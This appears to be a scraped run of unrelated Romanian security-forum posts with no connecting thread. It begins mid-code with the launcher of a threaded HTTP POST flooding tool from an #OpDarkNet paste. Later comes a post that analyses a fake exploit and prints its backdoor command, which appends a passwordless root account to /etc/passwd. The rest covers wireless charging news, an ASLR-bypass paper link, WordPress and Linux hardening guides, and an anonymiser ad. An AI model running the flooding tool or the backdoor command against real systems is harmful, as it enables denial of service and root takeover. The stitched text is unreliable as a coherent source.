usage() sys.exit(0) if o in ("-t", "--target"): target = a elif o in ("-r", "--threads"): threads = int(a) elif o in ("-p", "--port"): port = int(a) if target == '' or int(threads) <= 0: usage() sys.exit(-1) print term.DOWN + term.RED + "/*" + term.NORMAL print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL print term.RED + " * Threads: %d" % (threads) + term.NORMAL print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL rthreads = [] for i in range(threads): t = httpPost(target, port, tor) rthreads.append(t) t.start() while len(rthreads) > 0: try: rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] except KeyboardInterrupt: print "\nShutting down threads...\n" for t in rthreads: stop_now = True t.running = False if __name__ == "__main__": print "\n/*" print "********" print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*" print "********" print " */\n" main(sys.argv[1:]) Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com
-
Incarcarea wireless a devenit realitate de Radu Eftimie | 21 octombrie 2011 Probabil ca multi sunt de acord cu afirmatia ca nimic nu poate fi mai rau intr-o in care agenda ta este plina decat sa ramai fara baterie la telefonul mobil. Aceasta problema pare sa-si fi gasit deja rezolvarea, gratie tehnologiei Powermat, care asigura incarcarea dispozitivelor mobile on-the-go, scrie Mashable. Tehnologia wireless (fara fir) de incarcare a bateriilor exista din 2009, iar de atunci si pana in prezent compania incearca sa imbunatateasca sistemul. Powermat functioneaza pe principiul transferului de energie prin inductia magnetica. Energia este tranferata de la un emitator integrat in suportul de baza al dispozitivului revolutionar catre un receptor care se ataseaza (prin mufa dedicata) telefonului sau altui gadget care trebuie incarcat. Transferul de energie care se face prin intermediul campului magnetic este intrerupt automat in momentul in care bateria device-ului este incarcata total, pentru a se evita pierderea de energie. In viitor, compania, care acum conlucreaza cu Duracell, General Motors si alte nume mari din mai multe domenii, spune ca sistemul de incarcare wireless va deveni disponibil in aeroporturi, hoteluri, cafenele, birourile companiilor, dar si in fiecare casa. Powermat mai afirma ca tehnologia va deveni dominanta peste 10 ani. Sursa si video: Incarcarea wireless a devenit realitate | Hit.ro
-
E de la forum, nu stiu ce se poate face, sper sa nu trebuiasca schimbat encodingul tabelelor din baza de date. A zis kwe ca se ocupa cand are timp, il mai stresez eu.
-
Hosting "profesional": F:\xampp\htdocs...
-
Bypassing Windows 7 Kernel ASLR Authored by Stefan Le Berre Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1. Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf
-
Cred ca e fake, cel putin asa spun niste persoane care l-au analizat. Creeaza un cont de root fara parola.
-
Acel "evil" hex se termina cu: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD" Trimite datele unde ziceti voi: send(s, buffer, strlen(buffer), 0) Asta e executat local... execl("/bin/sh", "sh", "-c", evil, 0); Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti: if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu. Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme.
-
10 Steps to Securing Your WordPress Installation Fouad Matin on Sep 16th 2011 with 39 comments Tutorial Details Program: WordPress Version: 3.2.1 Difficulty: Beginner Estimated Completion Time: 20 - 30 minutes WordPress is open source which means that everyone, including hackers with a malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress and most importantly, your users. #1 Remove the Admin Superuser Probably, the easiest thing you could do to protect yourself is start off by changing/removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with a top-level security clearance, especially hackers. If the username is admin, how hard can it be to crack the password. Create a new administrative account but this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere, and make another account for you to publish content that has your name that does not have executive powers. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that does not need to be changed at on a daily basis – an editor account would be sufficient. “Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months.” ~Clifford Stoll #2 Chose a Strong Password Regardless of the type of site you are running, you may be at risk for a brute-force attack. In the first step when we deleted the admin username, probably deterred most hackers but there are always those that are very persistent or already know your username. The next step to take is to choose a very difficult password and diverse password. A good way to determine whether or not your password is secure is to enter it into an online password checker like passwordmeter.com or to generate a random password. #3 Secure Your Password Also, I prefer take extra precautions when protecting my blog, installing plugins can add an extra layer of security. There are numerous plugins that can handle passwords and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of all failed logins in addition to IP blocking after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute force attack – most attackers give up on a site if they are IP banned every 5 minutes while running their brute force program. #4 Always Update WordPress As I said earlier, WordPress is open source, making it an easier target for hackers. Nearly 60 million sites use WordPress, when Automattic pumps out an update, the sooner you update your site, the better because when they make a new update they also post the vulnerabilities that they fixed. Also, it doesn't take long to update your WordPress installation, according to WordPress it takes 5 minutes to complete. #5 Hide WordPress Version Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can hack your site, especially if it's out dated. By default, WordPress displays the version, because they want it for metrics to see how many people are using which version, etc… However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling for you, but it's always better to be sure. Open your functions.php file and drop in this line of code. <?php remove_action('wp_head', 'wp_generator'); ?> #6 Change File Permissions It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare, CHMOD value of 744 which essentially makes it read-only to everyone except you. Just open your FTP program and right click the folder or file and click on “File Permissions”. If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, only giving the “owner” full access. #7 Whitelist Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one, except for you, can access the folder. We do this using the .htaccess file. Navigate to your /wp-admin/ folder, then check if there is already a .htaccess file, if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file: AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "WordPress Admin Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all # Whitelist Your IP address allow from xx.xx.xx.xxx # Whitelist Your Office's IP address allow from xx.xx.xx.xxx # Whitelist Your IP address While Your Traveling (Delete When You Come Back Home) allow from xx.xx.xx.xxx </LIMIT> Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to be logging in from some where other than the places you added into your .htaccess file, you have to add the new IP address before you can use it. #8 Backup Regardless of the level of security of your WordPress site, it is a good habit to always backup your site. There are many ways to do this. You can take advantage of cron jobs, if you're hosting company provides it, by using this command: DBNAME=DB_NAME DBPASS=DB_PASSWORD DBUSER=DB_USER EMAIL="you@your_email.com" mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql gzip backup.sql DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz echo 'BLOG BACKUP:Your Backup is attached' | mutt -a $DBNAME-backup-$DATE.sql.gz $EMAIL -s "MySQL Backup" rm $DBNAME-backup-$DATE.sql.gz Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier especially when you need to re-set up your WordPress. #9 Hide Your Plugins Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, “Who cares if someone can see my plugins?”. Well, plugins can tell hackers how to hack your site, or at least if it is hackable. As you can see, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding blank index.html into the plugins folder is like putting a security sign in your lawn, it doesn't matter if you actually have the security system, but as long as the hacker doesn't know, he will be less inclined to try anything. #10 Analyze Server Logs The best security tool, regardless of whichever plugin/software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior. You're Set! Sursa: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/
-
Linux Security Basics Published: Monday, August 31st, 2009 by Sam Kleinman One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices. This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks. It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis. Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier.) There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems. Contents Keep Systems and Software Up To Date Disable Unused Services Lock Down SSH Limit Root and System Users' Access Use a Firewall to Block Unwanted Traffic Use Denyhosts or Fail2Ban to Prevent Password Attacks Encrypt Sensitive Data Best Practices with Databases Keep Systems and Software Up To Date One of the most significant sources of security vulnerabilities are systems running out of date software with known security holes. Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu Systems) or "yum update" (for CentOS and Fedora systems) is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages. System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python easy_install, and Haskell Cabal. You will have to manage the process of keeping these files up to date yourself. The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory). Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman. Because of the complexity of maintaining software outside of the system's package management tools we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice in a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server. Disable Unused Services One common avenue for attack involves exploiting unused applications. In general we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so. Not only will unused services no longer consume system resources, if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install with "apt-get install htop", "yum install htop" or "pacman -Sy htop". Lock Down SSH SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker. To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps. First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows: PermitRootLogin no If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root. Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file "/etc/ssh/sshd_config", modify PasswordAuthentication as follows: PasswordAuthentication no If you do not have SSH keys generated you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally: ssh-keygen Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names). scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys" If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY Homepage. If you have a problem logging in you will need physical access or out-of-band console access to your server to restore SSH functionally. You can use the Linode shell (LISH) to access your server's console. Limit Root and System Users' Access In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regards to managing your user accounts: Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases. If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user. Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system. Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock"). Limiting access to your servers and adhering to best practices with regards to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks. Use a Firewall to Block Unwanted Traffic As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious. On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions. Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself. This means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need. It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup needs must take the actual uses of your server and its users into account, we offer the following list as potential strategies for deploying a firewall. Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on. The most common standard ports include: web servers on port 80, ssh on port 22, smtp on port 25. If there are any security vulnerabilities for software running on other ports or intruders are scanning for open ports, the firewall will reject this traffic before it can invade your system. Disadvantages: This filter can be confusing if your suite of services change regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot. Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while. Disadvantages: People can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen. Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would be attackers from gaining access to your machines without hindering the good traffic. Disadvantages: This strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible. These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks. When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that actually want to service?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment. Use Denyhosts or Fail2Ban to Prevent Password Attacks The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, these applications will insert firewall rules that will block traffic from the attacker's IP address. The assumption is that "good" users are very likely to be able to get their password correct in less than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into a system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary. The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH. While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole. Encrypt Sensitive Data If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal. First, encrypt individual files using PGP and the tools provided by the GNU Privacy Gaurd package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key. The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable. Additionally, disk-level encryption protects against a very narrow set of threats: against physical attacks against the hardware and against unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience. The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this prevents the additional complexity of managing individual encrypted files, while still allowing for high quality data security. Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment. Best Practices with Databases One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications. Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or use code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires all input from external sources be tested with a regular expression before it may be used in your program. This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data. If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" are a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages. Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modification to your database or to access unauthorized content from your system. Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit. These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure. Sursa: Linux Security Basics
-
- 1
-
-
TUS - The Untraceable Surfer We provide a platform for true anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone. Download: https://www.tusurfer.com/tus/download.do Dear User, On the behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to be able to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although later I moved to Canada (one of the best countries in the world) I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also if you have any suggestion, concern or question we would love to hear from you. Kindest regards, Nigel Fox Info: https://www.tusurfer.com/tus/index.jsp